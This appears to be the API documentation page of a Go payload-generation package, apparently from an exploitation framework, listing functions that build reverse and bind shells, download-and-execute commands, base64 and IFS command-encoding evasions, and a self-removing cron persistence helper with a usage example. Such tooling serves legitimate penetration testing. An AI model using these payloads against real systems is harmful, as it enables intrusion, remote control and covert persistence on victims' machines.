Documentation
¶
Index ¶
- func BindShellMkfifoNetcat(bport int) string
- func BindShellMknodNetcat(bport int) string
- func BindShellNetcatGaping(bport int) string
- func BindShellTelnetdLogin(bport int) string
- func EncodeCommandBrace(cmd string) string
- func EncodeCommandIFS(cmd string) string
- func EncodeEchoBase64ToBash(cmd string) string
- func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
- func LinuxEitherHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
- func ReverseShellBash(lhost string, lport int) string
- func ReverseShellGJSScript(lhost string, lport int) string
- func ReverseShellJJSScript(lhost string, lport int, ssl bool) string
- func ReverseShellMkfifoOpenSSL(lhost string, lport int) string
- func ReverseShellMkfifoTelnet(lhost string, lport int, colon bool) string
- func ReverseShellMknodNetcat(lhost string, lport int) string
- func ReverseShellMknodOpenSSL(lhost string, lport int) string
- func ReverseShellMknodTelnet(lhost string, lport int, colon bool) string
- func ReverseShellNetcatGaping(lhost string, lport int) string
- func SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string)
- func ShortPHPLinuxInteractive(lhost string, lport int) string
- func UnflattenedClassicJava(lhost string, lport int) string
- func UnflattenedPHP(lhost string, lport int, shell string, encrypted bool) string
- func UnflattenedReversePython27(lhost string, lport int) string
- func UnflattenedSecureReversePython27(lhost string, lport int) string
- func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
func BindShellMkfifoNetcat ¶
func BindShellMknodNetcat ¶
func BindShellNetcatGaping ¶
func BindShellTelnetdLogin ¶
func EncodeCommandBrace ¶
func EncodeCommandIFS ¶
func EncodeEchoBase64ToBash ¶ added in v1.0.2
Base64 encodes the command. Wraps it in logic to base64 decode and pipe to bash.
func LinuxCurlHTTPDownloadAndExecute ¶ added in v1.0.8
Download a remote file with curl, execute it, and delete it.
func LinuxEitherHTTPDownloadAndExecute ¶ added in v1.4.0
func LinuxEitherHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
Download a remote file with curl or wget, execute it, and delete it.
func ReverseShellBash ¶
func ReverseShellGJSScript ¶ added in v1.0.12
Generates a script that can be used to create a reverse shell via gjs (Gnome JS - present on Ubuntu, Debian by default).
func ReverseShellJJSScript ¶ added in v1.0.13
Generates a script that can be used to create a reverse shell via jjs (Java javascript). This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation logic was adapted from a blog written by Callan Howell-Pavia.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
func ReverseShellMkfifoOpenSSL ¶ added in v1.0.14
func ReverseShellMknodNetcat ¶ added in v1.8.0
Reverse shell using nc when -e isn't an option.
func ReverseShellMknodTelnet ¶
func SelfRemovingCron ¶ added in v1.6.0
func SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string)
Creates two strings that can be used for gaining execution via "/etc/cron.d". The first return ("cron") should be uploaded to "cronPath" (presumably /etc/cron.d but I don't know your life), and the second return should be uploaded to "xploitPath" (e.g. /tmp/helloworld). The cron file will trigger execution of the bash script which will delete both the cron and itself. Example usage:
cronPath := fmt.Sprintf("/etc/cron.d/%s", random.RandLetters(8))
xploitPath := fmt.Sprintf("/tmp/%s", random.RandLetters(8))
xploit, ok := generatePayload(conf)
if !ok {
return false
}
cron, xploit := payload.SelfRemovingCron("root", cronPath, xploitPath, xploit)
func ShortPHPLinuxInteractive ¶ added in v1.11.0
A short payload that creates a reverse shell using /bin/sh -i.
func UnflattenedClassicJava ¶ added in v1.9.5
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
func UnflattenedPHP ¶ added in v1.11.0
Creates an encrypted reverse shell using PHP. The user can specify the shell used, for example cmd.exe, /bin/sh, etc. The user also specifies if the reverse shell should be encrypted or not.
payload.UnflattenedPHP("10.9.49.80", 1270, "/bin/sh", true).
func UnflattenedReversePython27 ¶ added in v1.1.0
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func UnflattenedSecureReversePython27 ¶ added in v1.1.0
An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
Types ¶
This section is empty.
Source Files